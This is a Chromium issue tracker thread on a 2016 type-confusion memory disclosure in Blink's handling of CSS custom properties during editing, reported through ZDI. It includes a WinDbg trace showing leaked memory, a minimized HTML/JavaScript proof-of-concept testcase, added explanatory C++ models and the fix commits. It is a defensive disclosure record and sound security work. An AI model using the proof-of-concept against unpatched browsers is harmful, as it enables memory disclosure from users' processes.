chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x95:
00007ffd`e3af6301 885538          mov     byte ptr [rbp+38h],dl ss:00000012`f836bdf8=20
0:000> t
chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x98:
00007ffd`e3af6304 4885c9          test    rcx,rcx
0:000> t
chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x9b:
00007ffd`e3af6307 742a            je      chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0xc7 (00007ffd`e3af6333) [br=0]
0:000> t
chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x9d:
00007ffd`e3af6309 8b45f0          mov     eax,dword ptr [rbp-10h] ss:00000012`f836bdb0=00000021
0:000> t
chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0xa0:
00007ffd`e3af630c 3b4104          cmp     eax,dword ptr [rcx+4] ds:000004f2`9c0780f4=00000021
0:000> t
chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0xa3:
00007ffd`e3af630f 7322            jae     chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0xc7 (00007ffd`e3af6333) [br=1]
0:000> t
chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0xc7:
00007ffd`e3af6333 458bc7          mov     r8d,r15d
0:000> t
chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0xca:
00007ffd`e3af6336 488d5538        lea     rdx,[rbp+38h]
0:000> t
chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0xce:
00007ffd`e3af633a 488d4dd8        lea     rcx,[rbp-28h]
0:000> t
chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0xd2:
00007ffd`e3af633e e8354771fe      call    chrome_child!WTF::StringBuilder::append (00007ffd`e220aa78)
0:000> p
chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0xd7:
00007ffd`e3af6343 488d5528        lea     rdx,[rbp+28h]
0:000> t
chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0xdb:
00007ffd`e3af6347 488bcb          mov     rcx,rbx
0:000> t
chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0xde:
00007ffd`e3af634a e8194ffaff      call    chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText (00007ffd`e3a9b268)
0:000> t
chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText:
00007ffd`e3a9b268 4053            push    rbx
0:000> t
chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x2:
00007ffd`e3a9b26a 4883ec30        sub     rsp,30h
0:000> t
chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x6:
00007ffd`e3a9b26e 488bda          mov     rbx,rdx
0:000> t
chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x9:
00007ffd`e3a9b271 488b5110        mov     rdx,qword ptr [rcx+10h] ds:000003f6`9bc83a88=0000000000000000
0:000> dq @rcx
000003f6`9bc83a78  00000000`00008000 0000023f`c54531a8
000003f6`9bc83a88  00000000`00000000 00000000`00000000
000003f6`9bc83a98  00000000`00000000 00000000`00000000
000003f6`9bc83aa8  00000000`00000000 00000000`00000000
000003f6`9bc83ab8  00000000`00000000 00000000`00000000
000003f6`9bc83ac8  00000000`00000000 00000000`00000000
000003f6`9bc83ad8  00000000`00000000 00000000`00000000
000003f6`9bc83ae8  00000000`00000000 00000000`00000000
0:000> t
chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0xd:
00007ffd`e3a9b275 4885d2          test    rdx,rdx
0:000> t
chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x10:
00007ffd`e3a9b278 7428            je      chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x3a (00007ffd`e3a9b2a2) [br=1]
0:000> t
chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x3a:
00007ffd`e3a9b2a2 e86df177fe      call    chrome_child!WTF::emptyString (00007ffd`e221a414)
0:000> p
chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x3f:
00007ffd`e3a9b2a7 488b08          mov     rcx,qword ptr [rax] ds:0000023f`c5410090=000004f29c004000
0:000> t
chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x42:
00007ffd`e3a9b2aa 48890b          mov     qword ptr [rbx],rcx ds:00000012`f836bde8=0000000000000000
0:000> t
chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x45:
00007ffd`e3a9b2ad 4885c9          test    rcx,rcx
0:000> t
chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x48:
00007ffd`e3a9b2b0 7402            je      chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x4c (00007ffd`e3a9b2b4) [br=0]
0:000> t
chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x4a:
00007ffd`e3a9b2b2 ff01            inc     dword ptr [rcx] ds:000004f2`9c004000=0000004a
0:000> t
chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x4c:
00007ffd`e3a9b2b4 488bc3          mov     rax,rbx
0:000> t
chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x4f:
00007ffd`e3a9b2b7 4883c430        add     rsp,30h
0:000> t
chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x53:
00007ffd`e3a9b2bb 5b              pop     rbx
0:000> t
chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x54:
00007ffd`e3a9b2bc c3              ret
0:000> bl
 0 e 00007ffd`e3b20b8f     0001 (0004)  0:**** chrome_child!blink::CSSPropertyParser::parseValueStart+0x57
 1 e 00007ffd`e3af62be     0001 (0001)  0:**** chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x52
 2 e 0000023f`c54531b4 r 1 0001 (0001)  0:****
 3 e 00007ffd`e3cb3a94     0001 (0001)  0:**** chrome_child!blink::ChromeClient::openJavaScriptAlert
0:000> bd 0-2
0:000> g
Breakpoint 3 hit
chrome_child!blink::ChromeClient::openJavaScriptAlert:
00007ffd`e3cb3a94 4053            push    rbx
0:000> db poi(@r8)+c
000004f2`9c1a416c  3c 00 66 00 69 00 67 00-75 00 72 00 65 00 20 00  <.f.i.g.u.r.e. .
000004f2`9c1a417c  73 00 74 00 79 00 6c 00-65 00 3d 00 22 00 66 00  s.t.y.l.e.=.".f.
000004f2`9c1a418c  6c 00 6f 00 61 00 74 00-3a 00 20 00 76 00 61 00  l.o.a.t.:. .v.a.
000004f2`9c1a419c  72 00 28 00 2d 00 2d 00-43 00 43 00 43 00 43 00  r.(.-.-.C.C.C.C.
000004f2`9c1a41ac  29 00 3b 00 20 00 f2 04-00 00 00 e5 00 9c f2 04  ).;. ...........
000004f2`9c1a41bc  00 00 04 00 00 00 50 00-57 00 4e 00 45 00 44 00  ......P.W.N.E.D.
000004f2`9c1a41cc  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
000004f2`9c1a41dc  00 00 00 00 02 3f c5 45-32 18 00 00 00 00 00 00  .....?.E2.......
0:000> vertarget
Windows 10 Version 10586 MP (4 procs) Free x64
Product: WinNt, suite: SingleUserTS
kernelbase.dll version: 10.0.10586.306 (th2_release_sec.160422-1850)
Machine Name:
Debug session time: Tue Jun 14 17:57:03.575 2016 (UTC - 5:00)
System Uptime: 0 days 4:59:37.015
Process Uptime: 0 days 0:05:01.854
  Kernel time: 0 days 0:00:00.109
  User time: 0 days 0:00:00.187
```

-- CREDIT ---------------------------------------
This vulnerability was discovered by:
62600BCA031B9EB5CB4A74ADDDD6771E working with Trend Micro's Zero Day Initiative

-- FURTHER DETAILS ------------------------------
If supporting files were contained with this report they are provided within a password protected ZIP file. The password is the ZDI candidate number in the form: ZDI-CAN-XXXX where XXXX is the ID number.

Please confirm receipt of this report. We expect all vendors to remediate ZDI vulnerabilities within 120 days of the reported date. If you are ready to release a patch at any point leading up to the deadline, please coordinate with us so that we may release our advisory detailing the issue. If the 120-day deadline is reached and no patch has been made available we will release a limited public advisory with our own mitigations, so that the public can protect themselves in the absence of a patch.
Please keep us updated regarding the status of this issue and feel free to contact us at any time: Zero Day Initiative zdi-disclosures@trendmicro.com The PGP key used for all ZDI vendor communications is available from: http://www.zerodayinitiative.com/documents/disclosures-pgp-key.asc -- INFORMATION ABOUT THE ZDI --------------------- Established by TippingPoint and acquired by Trend Micro, the Zero Day Initiative (ZDI) neither re-sells vulnerability details nor exploit code. Instead, upon notifying the affected product vendor, the ZDI provides its Trend Micro TippingPoint customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Please contact us for further details or refer to: http://www.zerodayinitiative.com -- DISCLOSURE POLICY ---------------------------- Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/
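The `db poi(@r8)+c` dump at the openJavaScriptAlert breakpoint above is the string that reached script: UTF-16 text that starts with the serialised style attribute and then runs into bytes that were never text. What follows is an added example, not part of the ZDI report or of Chromium, that parses windbg `db` output back into raw bytes and decodes them as UTF-16LE, reporting where the string stops being printable. The sample input is the eight dump lines copied from the report (plus the `db` command line, which the parser skips); the parser's line-format assumptions are stated in the comments.

```cpp
// Added example, not Chromium code: recover the leaked string from a windbg `db`
// dump. Assumes the default db layout: `hhhhhhhh`hhhhhhhh` address, two spaces,
// 16 hex bytes separated by ' ' (or '-' between bytes 8 and 9), then ASCII.
#include <cstdint>
#include <cstdio>
#include <sstream>
#include <string>
#include <vector>

static int hexVal(char c) {
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

// Collect the 16 data bytes from every db line; non-dump lines are ignored.
std::vector<uint8_t> parseDbDump(const std::string& dump) {
    std::vector<uint8_t> bytes;
    std::istringstream lines(dump);
    std::string line;
    while (std::getline(lines, line)) {
        std::istringstream fields(line);
        std::string address;
        fields >> address;
        if (address.size() != 17 || address[8] != '`') continue;  // not a db line
        size_t pos = line.find(address) + address.size();
        int got = 0;
        while (got < 16 && pos + 1 < line.size()) {
            if (line[pos] == ' ' || line[pos] == '-') { ++pos; continue; }
            int hi = hexVal(line[pos]), lo = hexVal(line[pos + 1]);
            if (hi < 0 || lo < 0) break;
            bytes.push_back(static_cast<uint8_t>(hi * 16 + lo));
            pos += 2;
            ++got;
        }
    }
    return bytes;
}

struct Decoded {
    std::string text;         // printable ASCII as-is, every other unit as \uXXXX
    size_t firstNonTextUnit;  // index of the first code unit outside printable ASCII
    size_t nonTextUnits;      // how many code units are not printable ASCII
};

// Decode little-endian UTF-16 code units and mark where real text stops.
Decoded decodeUtf16Le(const std::vector<uint8_t>& bytes) {
    Decoded d{"", std::string::npos, 0};
    for (size_t i = 0; i + 1 < bytes.size(); i += 2) {
        uint16_t unit = static_cast<uint16_t>(bytes[i] | (bytes[i + 1] << 8));
        if (unit >= 0x20 && unit <= 0x7e) {
            d.text.push_back(static_cast<char>(unit));
        } else {
            char buf[8];
            std::snprintf(buf, sizeof buf, "\\u%04x", static_cast<unsigned>(unit));
            d.text += buf;
            if (d.firstNonTextUnit == std::string::npos) d.firstNonTextUnit = i / 2;
            ++d.nonTextUnits;
        }
    }
    return d;
}

// Sample input: the db lines from the report, copied verbatim.
const char* kDumpFromReport = R"dump(
0:000> db poi(@r8)+c
000004f2`9c1a416c  3c 00 66 00 69 00 67 00-75 00 72 00 65 00 20 00  <.f.i.g.u.r.e. .
000004f2`9c1a417c  73 00 74 00 79 00 6c 00-65 00 3d 00 22 00 66 00  s.t.y.l.e.=.".f.
000004f2`9c1a418c  6c 00 6f 00 61 00 74 00-3a 00 20 00 76 00 61 00  l.o.a.t.:. .v.a.
000004f2`9c1a419c  72 00 28 00 2d 00 2d 00-43 00 43 00 43 00 43 00  r.(.-.-.C.C.C.C.
000004f2`9c1a41ac  29 00 3b 00 20 00 f2 04-00 00 00 e5 00 9c f2 04  ).;. ...........
000004f2`9c1a41bc  00 00 04 00 00 00 50 00-57 00 4e 00 45 00 44 00  ......P.W.N.E.D.
000004f2`9c1a41cc  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
000004f2`9c1a41dc  00 00 00 00 02 3f c5 45-32 18 00 00 00 00 00 00  .....?.E2.......
)dump";

Decoded decodeReportDump() { return decodeUtf16Le(parseDbDump(kDumpFromReport)); }

int main() {
    Decoded d = decodeReportDump();
    std::printf("%s\n", d.text.c_str());
    std::printf("text ends at code unit %zu; %zu non-text units follow\n",
                d.firstNonTextUnit, d.nonTextUnits);
    return 0;
}
```

For this dump the printable prefix is exactly the serialised `<figure style="float: var(--CCCC); ` fragment, 35 code units long; the units after it are pointer-sized values rather than characters, and `PWNED` shows up later in the same buffer, which is the cheapest way to confirm that the string handed to script was built from a memory region that was never a string.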
,
Jun 22 2016
ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://cluster-fuzz.appspot.com/testcase?key=6340138707976192
,
Jun 22 2016
Looks like the code in question came from crrev.com/1405293012. +alancutter and +timloh, who reviewed the CL. Can you take a look at this and verify if it's an issue?
,
Jun 22 2016
,
Jun 24 2016
Tentatively assigning labels
,
Jun 24 2016
alancutter@ is away for the next week. Reassigning to timloh - can you have a look at this and triage?
,
Jun 24 2016
ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://cluster-fuzz.appspot.com/testcase?key=5690139632467968
,
Jun 24 2016
,
Jun 26 2016
,
Jun 27 2016
mergeStyle() looks like it handles custom properties badly. Doesn't seem to repro in ToT, not sure why. Will look more into this later.
,
Jun 29 2016
,
Jul 5 2016
I could reproduce this with poc2.html attached in the CF Crash Report at #c7 with today's ToT.
This is the DCHECK() in the toCSSCustomPropertyDeclaration() call, where |property.value().m_class| is VariableReferenceClass(32) instead of CustomPropertyDeclarationClass.
I'm not sure whether VariableReferenceClass implies CustomPropertyDeclarationClass or not.
```cpp
bool MutableStylePropertySet::setProperty(const CSSProperty& property, CSSProperty* slot)
{
    if (!removeShorthandProperty(property.id())) {
        const AtomicString& name = (property.id() == CSSPropertyVariable) ?
            toCSSCustomPropertyDeclaration(property.value())->name() : nullAtom;
```
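The comment above pins the failure to a class tag: the CSSValue stored under CSSPropertyVariable is a CSSVariableReferenceValue, and in a Release build toCSSCustomPropertyDeclaration() is a bare static_cast, so the DCHECK that catches it here is compiled out and getCustomPropertyText() reads a CSSVariableData pointer as the declaration's name. The fix that landed on this bug changes EditingStyle::mergeStyle() to stop serialising and reparsing the value, since the reparse only has the enum id and loses the custom property name. The block below is an added example, not Blink's code: a reduced model of the tagged hierarchy with the unchecked and the checked downcast side by side, the serialise-and-reparse step that yields the wrong class, and the object-preserving merge. Class and member names follow the thread; the layouts, the serializer and the parser are assumptions made for the model.

```cpp
// Added example, not Blink code: a reduced model of the tagged CSSValue
// hierarchy, the unchecked downcast, and the serialise-and-reparse step in
// EditingStyle::mergeStyle() that produced the wrong class. Names follow the
// bug thread; the layouts, serializer and parser below are assumptions.
#include <cstdio>
#include <memory>
#include <string>
#include <utility>

enum class ClassType { kPrimitive, kCustomPropertyDeclaration, kVariableReference };

struct CSSValue {
    explicit CSSValue(ClassType c) : classType(c) {}
    virtual ~CSSValue() = default;
    bool isCustomPropertyDeclaration() const { return classType == ClassType::kCustomPropertyDeclaration; }
    bool isVariableReference() const { return classType == ClassType::kVariableReference; }
    ClassType classType;  // Blink's m_class tag
};

// Value of a custom property, e.g. `--AAAA: var(--BBBB)`. The name has to live
// here because the property id is only the enum value CSSPropertyVariable.
struct CSSCustomPropertyDeclaration : CSSValue {
    CSSCustomPropertyDeclaration(std::string n, std::string t)
        : CSSValue(ClassType::kCustomPropertyDeclaration), name(std::move(n)), text(std::move(t)) {}
    std::string name;  // AtomicString in Blink
    std::string text;
};

// Value of a standard property that references a variable, e.g. `float: var(--CCCC)`.
// There is no name field; whatever sits here is what a confused name() read returns.
struct CSSVariableReferenceValue : CSSValue {
    explicit CSSVariableReferenceValue(std::string t)
        : CSSValue(ClassType::kVariableReference), variableData(std::move(t)) {}
    std::string variableData;  // CSSVariableData* in Blink
};

// What the to*() cast helpers reduce to in Release builds: a static_cast
// guarded only by a DCHECK that is compiled out.
CSSCustomPropertyDeclaration* toCSSCustomPropertyDeclarationUnchecked(CSSValue* v) {
    return static_cast<CSSCustomPropertyDeclaration*>(v);
}

// Checked variant: consult the tag and refuse a mismatch instead of reading
// through the wrong type.
CSSCustomPropertyDeclaration* toCSSCustomPropertyDeclarationChecked(CSSValue* v) {
    if (!v || !v->isCustomPropertyDeclaration()) return nullptr;
    return static_cast<CSSCustomPropertyDeclaration*>(v);
}

struct CSSProperty {
    std::string id;                 // "CSSPropertyVariable" for every custom property
    std::shared_ptr<CSSValue> value;
};

// Assumed serializer: a declaration prints its value text, a reference its tokens.
std::string serializeValue(const CSSValue& v) {
    if (v.isCustomPropertyDeclaration()) return static_cast<const CSSCustomPropertyDeclaration&>(v).text;
    if (v.isVariableReference()) return static_cast<const CSSVariableReferenceValue&>(v).variableData;
    return "";
}

// Assumed parser for "id: text". It only sees the enum id, so the custom
// property's name is gone and "var(...)" comes back as a reference value.
std::shared_ptr<CSSValue> parseValue(const std::string& id, const std::string& text) {
    (void)id;  // CSSPropertyVariable carries no name to recover
    if (text.rfind("var(", 0) == 0) return std::make_shared<CSSVariableReferenceValue>(text);
    return std::make_shared<CSSValue>(ClassType::kPrimitive);
}

// Pre-fix mergeStyle(): serialize the value, then reparse it under the same id.
CSSProperty mergeStyleSerializeReparse(const CSSProperty& p) {
    return {p.id, parseValue(p.id, serializeValue(*p.value))};
}

// Post-fix mergeStyle(): carry the CSSValue object across unchanged.
CSSProperty mergeStyleKeepValue(const CSSProperty& p) {
    return {p.id, p.value};
}

// getCustomPropertyText with the tag check the original lacked: reports
// failure rather than treating a CSSVariableReferenceValue as a declaration.
bool getCustomPropertyText(const CSSProperty& p, std::string& out) {
    CSSCustomPropertyDeclaration* decl = toCSSCustomPropertyDeclarationChecked(p.value.get());
    if (!decl) return false;
    out = decl->name + ": " + decl->text;
    return true;
}

int main() {
    CSSProperty original{"CSSPropertyVariable",
                         std::make_shared<CSSCustomPropertyDeclaration>("--AAAA", "var(--BBBB)")};
    std::string text;
    CSSProperty merged = mergeStyleSerializeReparse(original);
    std::printf("serialize+reparse: %s\n",
                getCustomPropertyText(merged, text) ? text.c_str() : "not a declaration, refused");
    CSSProperty kept = mergeStyleKeepValue(original);
    std::printf("keep value: %s\n", getCustomPropertyText(kept, text) ? text.c_str() : "lost");
    return 0;
}
```

The model makes the two halves of the bug visible separately: the reparse path hands back a CSSVariableReferenceValue under CSSPropertyVariable (the state the DCHECK complained about), and the unchecked cast accepts that object without complaint. Either half fixed on its own would have been enough to stop the disclosure; Chromium fixed the producer, and a tag check at the consumer is the defence-in-depth a reviewer would still ask for in code that is only a DCHECK away from a wrong static_cast.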
,
Jul 6 2016
ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://cluster-fuzz.appspot.com/testcase?key=5368642518908928
,
Jul 6 2016
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=5368642518908928
Job Type: linux_asan_chrome_mp
Platform Id: linux
Crash Type: ASSERT
Crash Address:
Crash State:
  !value || (value->isCustomPropertyDeclaration())
  blink::MutableStylePropertySet::setProperty
  blink::MutableStylePropertySet::addParsedProperties
Regressed: https://cluster-fuzz.appspot.com/revisions?job=linux_asan_chrome_mp&range=365683:366004
Minimized Testcase (0.67 Kb): Download: https://cluster-fuzz.appspot.com/download/AMIfv94T5Yq8K67FKD5FPNGltSu9r7Zubq14IMGSBsv8DyCPfvpS9g3ACgRgx4s1ZjbygrfqGgzwANriIhIxmQFs7XVSR8qYrykNlJdUwNHUd-xZsec8eV4jl8nUDa2JHYxhYREWmgLIAvwnIe3B-td_L8v88kODDg?testcase_id=5368642518908928
```html
<script>
document.documentElement.contentEditable = "true"
document.documentElement.appendChild(document.createElement('table'))
eAcronym = document.createElement('acronym')
document.documentElement.appendChild(eAcronym)
document.documentElement.appendChild(document.createElement('keygen'))
// custom property whose value is itself a var() reference
newElem = document.createElement('figure')
newElem.style.cssText = '--AAAA: var(--BBBB)'
document.documentElement.appendChild(newElem)
// standard property referencing a variable
eCite = document.createElement('cite')
eCite.style.cssText = 'float: var(--CCCC)'
eAcronym.appendChild(eCite)
eCite.appendChild(document.createElement('marquee'));
// editing commands over the selection merge the inline styles (EditingStyle::mergeStyle)
document.execCommand('SelectAll')
document.execCommand('RemoveFormat')
</script>
```
See https://dev.chromium.org/Home/chromium-security/bugs/reproducing-clusterfuzz-bugs for more information.
,
Jul 13 2016
timloh: Uh oh! This issue still open and hasn't been updated in the last 14 days. This is a serious vulnerability, and we want to ensure that there's progress. Could you please leave an update with the current status and any potential blockers? If you're not the right owner for this issue, could you please remove yourself as soon as possible or help us find the right one? If the issue is fixed or you can't reproduce it, please close the bug. If you've started working on a fix, please set the status to Started. Thanks for your time! To disable nags, add the Disable-Nags label. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Jul 27 2016
timloh: Uh oh! This issue still open and hasn't been updated in the last 28 days. This is a serious vulnerability, and we want to ensure that there's progress. Could you please leave an update with the current status and any potential blockers? If you're not the right owner for this issue, could you please remove yourself as soon as possible or help us find the right one? If the issue is fixed or you can't reproduce it, please close the bug. If you've started working on a fix, please set the status to Started. Thanks for your time! To disable nags, add the Disable-Nags label. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Aug 9 2016
The following revision refers to this bug:
https://chromium.googlesource.com/chromium/src.git/+/aadb63893e4c1358d1e5139aa29552eb190682c8

commit aadb63893e4c1358d1e5139aa29552eb190682c8
Author: timloh <timloh@chromium.org>
Date: Tue Aug 09 08:19:22 2016

Fix EditingStyle::mergeStyle()'s handling of custom properties

This patch fixes the logic of EditingStyle::mergeStyle() to correctly handle custom properties. Currently it serializes the CSSValue and then reparses it, which, aside from being inefficient, doesn't work for custom properties as the custom property name is lost (since we only have the enum value CSSPropertyVariable).

BUG= 622420

Review-Url: https://codereview.chromium.org/2103043004
Cr-Commit-Position: refs/heads/master@{#410614}

[modify] https://crrev.com/aadb63893e4c1358d1e5139aa29552eb190682c8/third_party/WebKit/Source/core/core.gypi
[modify] https://crrev.com/aadb63893e4c1358d1e5139aa29552eb190682c8/third_party/WebKit/Source/core/css/StylePropertySet.cpp
[modify] https://crrev.com/aadb63893e4c1358d1e5139aa29552eb190682c8/third_party/WebKit/Source/core/editing/EditingStyle.cpp
[modify] https://crrev.com/aadb63893e4c1358d1e5139aa29552eb190682c8/third_party/WebKit/Source/core/editing/EditingStyle.h
[add] https://crrev.com/aadb63893e4c1358d1e5139aa29552eb190682c8/third_party/WebKit/Source/core/editing/EditingStyleTest.cpp
,
Aug 10 2016
ClusterFuzz has detected this issue as fixed in range 410604:410621.
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=5690139632467968
Job Type: linux_asan_chrome_mp
Platform Id: linux
Crash Type:
Crash Address:
Crash State:
Fixed: https://cluster-fuzz.appspot.com/revisions?job=linux_asan_chrome_mp&range=410604:410621
Unminimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv962bJmF4zCnXnYhCsNwGmpOsoyg_7y-hF-5IruojcMrjlEiXI4QncSyk_zgZ4ntVVap84IqTY30vDXdTscTiROgCL8PhmVfYYuVq49UoyPo18gZkr8bAlg7hJt9Wv-4R2PLM7svT_iYTbe_mRGu7sWzMxHz1w?testcase_id=5690139632467968
See https://dev.chromium.org/Home/chromium-security/bugs/reproducing-clusterfuzz-bugs for more information.
If you suspect that the result above is incorrect, try re-doing that job on the test case report page.
,
Aug 10 2016
Fixed as per #18.
,
Aug 10 2016
ClusterFuzz has detected this issue as fixed in range 410604:410621.
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=5368642518908928
Job Type: linux_asan_chrome_mp
Platform Id: linux
Crash Type: ASSERT
Crash Address:
Crash State:
  !value || (value->isCustomPropertyDeclaration())
  blink::MutableStylePropertySet::setProperty
  blink::MutableStylePropertySet::addParsedProperties
Regressed: https://cluster-fuzz.appspot.com/revisions?job=linux_asan_chrome_mp&range=365683:366004
Fixed: https://cluster-fuzz.appspot.com/revisions?job=linux_asan_chrome_mp&range=410604:410621
Minimized Testcase (0.67 Kb): Download: https://cluster-fuzz.appspot.com/download/AMIfv94T5Yq8K67FKD5FPNGltSu9r7Zubq14IMGSBsv8DyCPfvpS9g3ACgRgx4s1ZjbygrfqGgzwANriIhIxmQFs7XVSR8qYrykNlJdUwNHUd-xZsec8eV4jl8nUDa2JHYxhYREWmgLIAvwnIe3B-td_L8v88kODDg?testcase_id=5368642518908928
```html
<script>
document.documentElement.contentEditable = "true"
document.documentElement.appendChild(document.createElement('table'))
eAcronym = document.createElement('acronym')
document.documentElement.appendChild(eAcronym)
document.documentElement.appendChild(document.createElement('keygen'))
// custom property whose value is itself a var() reference
newElem = document.createElement('figure')
newElem.style.cssText = '--AAAA: var(--BBBB)'
document.documentElement.appendChild(newElem)
// standard property referencing a variable
eCite = document.createElement('cite')
eCite.style.cssText = 'float: var(--CCCC)'
eAcronym.appendChild(eCite)
eCite.appendChild(document.createElement('marquee'));
// editing commands over the selection merge the inline styles (EditingStyle::mergeStyle)
document.execCommand('SelectAll')
document.execCommand('RemoveFormat')
</script>
```
See https://dev.chromium.org/Home/chromium-security/bugs/reproducing-clusterfuzz-bugs for more information.
If you suspect that the result above is incorrect, try re-doing that job on the test case report page.
,
Aug 10 2016
,
Aug 10 2016
,
Aug 10 2016
Your change meets the bar and is auto-approved for M53 (branch: 2785)
,
Aug 11 2016
Please merge your change to M53 branch 2785 ASAP (latest before 5:00 PM PT, Friday 08/12) so we can take it in for next week beta. Thank you.
,
Aug 12 2016
The following revision refers to this bug:
https://chromium.googlesource.com/chromium/src.git/+/ed9e60bc6238f29c78a85229e57a07256c4f66e4

commit ed9e60bc6238f29c78a85229e57a07256c4f66e4
Author: Timothy Loh <timloh@chromium.org>
Date: Fri Aug 12 04:33:40 2016

Fix EditingStyle::mergeStyle()'s handling of custom properties

This patch fixes the logic of EditingStyle::mergeStyle() to correctly handle custom properties. Currently it serializes the CSSValue and then reparses it, which, aside from being inefficient, doesn't work for custom properties as the custom property name is lost (since we only have the enum value CSSPropertyVariable).

BUG= 622420

Review-Url: https://codereview.chromium.org/2103043004
Cr-Commit-Position: refs/heads/master@{#410614}
(cherry picked from commit aadb63893e4c1358d1e5139aa29552eb190682c8)

Review URL: https://codereview.chromium.org/2245573002 .

Cr-Commit-Position: refs/branch-heads/2785@{#574}
Cr-Branched-From: 68623971be0cfc492a2cb0427d7f478e7b214c24-refs/heads/master@{#403382}

[modify] https://crrev.com/ed9e60bc6238f29c78a85229e57a07256c4f66e4/third_party/WebKit/Source/core/core.gypi
[modify] https://crrev.com/ed9e60bc6238f29c78a85229e57a07256c4f66e4/third_party/WebKit/Source/core/css/StylePropertySet.cpp
[modify] https://crrev.com/ed9e60bc6238f29c78a85229e57a07256c4f66e4/third_party/WebKit/Source/core/editing/EditingStyle.cpp
[modify] https://crrev.com/ed9e60bc6238f29c78a85229e57a07256c4f66e4/third_party/WebKit/Source/core/editing/EditingStyle.h
[add] https://crrev.com/ed9e60bc6238f29c78a85229e57a07256c4f66e4/third_party/WebKit/Source/core/editing/EditingStyleTest.cpp
,
Aug 24 2016
,
Aug 24 2016
,
Aug 26 2016
,
Sep 14 2016
,
Nov 16 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Apr 25 2018
Comment 1 by zdi-disc...@hp.com, Jun 22 2016: attachment (498 bytes)